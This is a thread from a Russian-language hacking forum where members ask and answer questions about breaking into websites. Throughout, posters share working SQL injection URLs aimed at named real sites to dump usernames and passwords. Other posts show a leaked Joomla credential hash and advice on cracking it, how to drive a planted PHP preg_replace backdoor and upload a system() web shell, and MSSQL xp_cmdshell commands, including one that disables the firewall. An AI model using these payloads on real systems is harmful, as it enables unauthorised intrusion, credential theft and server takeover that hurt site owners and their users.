Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    потому что таблица users в другой базе данных
    http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8+from+test.users/*

    опередили...
     
    1 person likes this.
  2. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    чем расшифровать пасы от джумлы, подскажите чего-нить особо эффективное)

    sotramxan:bffc841658e3eb534f41915454d2cd6b:mLvhGI5BGHOuIKq7:[email protected]
     
  3. :{-VaigeR-}:

    :{-VaigeR-}: New Member

    Joined:
    11 Nov 2008
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    У лебедя попробуй, хешкрякинг рулит! Я вот сча не помню где-то видел короче написали програму которая хеши брутит через видюху, правда там ни все поддерживает видеокарты, но говорят скорость брута мега супер! Попробую сча найти!

    ЗЫ Нашел, на держи - http://forum.insidepro.com/viewtopic.php?t=1983
     
    #3643 :{-VaigeR-}:, 12 Nov 2008
    Last edited: 12 Nov 2008
    1 person likes this.
  4. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    если ты не заметил то тут джумла с солью и hashcracking.info не поможет
     
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://www.ascmfoot.freesurf.fr/joueur.php3?idj=-37+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* - помогите найти таблицы, пожалуйста)) а лучше посоветуйте прогу для подбора таблиц по словорю,а то что-то найти не могу((
     
  6. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    SELECT ..... UNHEX(HEX(pole).... FROM ...
     
  7. Модный

    Модный Banned

    Joined:
    8 Aug 2008
    Messages:
    1
    Likes Received:
    3
    Reputations:
    0
    Онлайн ломалку не найдешь, юзай брутеры с алгоритмом md5($pass.$sault) к примеру passwordspro
     
    #3647 Модный, 13 Nov 2008
    Last edited: 13 Nov 2008
    1 person likes this.
  8. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте! :)

    Подскажите,

    есть код внедренный в .php файл на сервере:

    Code:
    if(isset($_REQUEST['act']) and isset($_REQUEST['id4']) preg_replace("/55/e",$_REQUEST['act'],$_REQUEST['id4']); 
    подскажите, как его правильно использовать?
    Т.е. как правильно передать несколько строк php в него, чтобы они выполнились?

    Спасибо! :)
     
  9. 9()K_t()R

    9()K_t()R Banned

    Joined:
    9 Nov 2008
    Messages:
    4
    Likes Received:
    5
    Reputations:
    0
    Code:
    1+union+select+convert(pole)+using+latin1),+from+table/*
     
    2 people like this.
  10. 9()K_t()R

    9()K_t()R Banned

    Joined:
    9 Nov 2008
    Messages:
    4
    Likes Received:
    5
    Reputations:
    0
    Code:
     index.php?id4=123&act=phpinfo();
     
    #3650 9()K_t()R, 13 Nov 2008
    Last edited: 13 Nov 2008
    2 people like this.
  11. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0

    работает! :)
    php_inj.php?id4=5567&act=phpinfo();

    Code:
    if(isset($_REQUEST['act']) and isset($_REQUEST['id4'])) preg_replace("/55/e",$_REQUEST['act'],$_REQUEST['id4']); 
    а какой код нужен, чтобы шелл залить?
     
    #3651 fervex, 13 Nov 2008
    Last edited: 13 Nov 2008
  12. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    fervex

    '<?system($_GET[cmd]);?>'
    Можешь захексить (ну и если с кавычками в порядке)

    потом обращаешься к нему

    /shell.php?cmd=ls -la

    Только найди диреторию drwxrwxrwx =) temp or tmp search
     
  13. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Есть у меня доступ к MSSQL на одном сайте. По началу мне казалось, что сайт лежит на этом же сервере. Перерыл все и не нашел )) Только потом до меня доперло, что sql server и web сервер - это разные физические сервера.
    Доступ у меня через бажный скрипт (index.asp?id=-1' такого рода), права dbo, комманды исполняются на ура.
    Собственно сам вопрос : Как мне узнать внешний IP MSSQL сервера?
     
  14. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    помотри можно-ли выполнить консольные команды, если можно то настрой firewall и пингани себя.

    http://site.com/script.asp?id=1';exec master..xp_cmdshell 'ping -a твойip'--
     
    #3654 truelamer, 13 Nov 2008
    Last edited: 13 Nov 2008
  15. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    не думаю, что SQL сервер будет доступен из веб...
    SELECT HOST_NAME()
     
  16. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Что-то блокирует пинги и тд. В процессах я не обнаружил нестандартных firewall'ов. А стандартный вырубил (предполагаю :) ) командой netsh firewall set opmode disable

    Вот перечень процессов:

    --------------------------------------------------------------
    > tasklist
    hex code : 0x7461736b6c697374
    --------------------------------------------------------------
    Directory listing
    --------------------------------------------------------------
    smss.exe 276 Console 0 448 K
    csrss.exe 324 Console 0 3,884 K
    winlogon.exe 348 Console 0 11,668 K
    services.exe 396 Console 0 12,264 K
    lsass.exe 408 Console 0 8,216 K
    svchost.exe 584 Console 0 2,760 K
    svchost.exe 648 Console 0 3,340 K
    svchost.exe 728 Console 0 4,676 K
    svchost.exe 764 Console 0 5,008 K
    svchost.exe 780 Console 0 25,320 K
    spoolsv.exe 932 Console 0 5,172 K
    msdtc.exe 956 Console 0 4,884 K
    svchost.exe 1164 Console 0 2,172 K
    FPAVServer.exe 1184 Console 0 46,464 K
    FreeFTPDService.exe 1216 Console 0 4,444 K
    inetinfo.exe 1244 Console 0 13,132 K
    sqlservr.exe 1324 Console 0 1,556,928 K
    svchost.exe 1820 Console 0 1,316 K
    winvnc4.exe 1108 Console 0 3,308 K
    mssearch.exe 1428 Console 0 1,116 K
    sqlagent.exe 1736 Console 0 4,852 K
    svchost.exe 2072 Console 0 4,752 K
    distrib.exe 2360 Console 0 6,736 K
    logread.exe 2400 Console 0 6,324 K
    distrib.exe 2444 Console 0 6,536 K
    wmiprvse.exe 2624 Console 0 6,640 K
    svchost.exe 2840 Console 0 3,936 K
    logon.scr 3684 Console 0 1,660 K
    cmd.exe 3648 Console 0 1,496 K
    more.com 3704 Console 0 5,392 K
    cmd.exe 3252 Console 0 1,492 K
    --------------------------------------------------------------

    Есть подозрение на FPAVServer.exe, но вроде как это антивирус.
     
  17. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    попробуй совет [Raz0r]

    http://site.com/script.asp?id=1 or 1=(select HOST_NAME())--

    a еще попробуй через cmd ipconfig
     
    #3657 truelamer, 13 Nov 2008
    Last edited: 13 Nov 2008
  18. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Пробовал. Ответ - ALFIE.
    Возможно сервер действительно только локальный и доступа ко внешке у него нет. ipconfig я в первую очередь делал :) Но он мне выдал DNS-суффикс и локальный адрес.
    Можно-ли ченить с этого поднять? Или без вариантов?
     
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Через SELECT ..... UNHEX(HEX(pole).... FROM ... не получилось
    я не понял, а как с этим делать 1+union+select+convert(pole)+using+latin1),+from+t able/* ?
    Запрос такого вида +select+1,2,3,4,5,[видимое поле],7,8,9,10+from+users/*
    название поля к примеру name
    Помогите, пожалуйста))
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    1+union+select+1,2,3,4,5,UNHEX(HEX(name)),7,8,9,10+from+users/*
     
Thread Status:
Not open for further replies.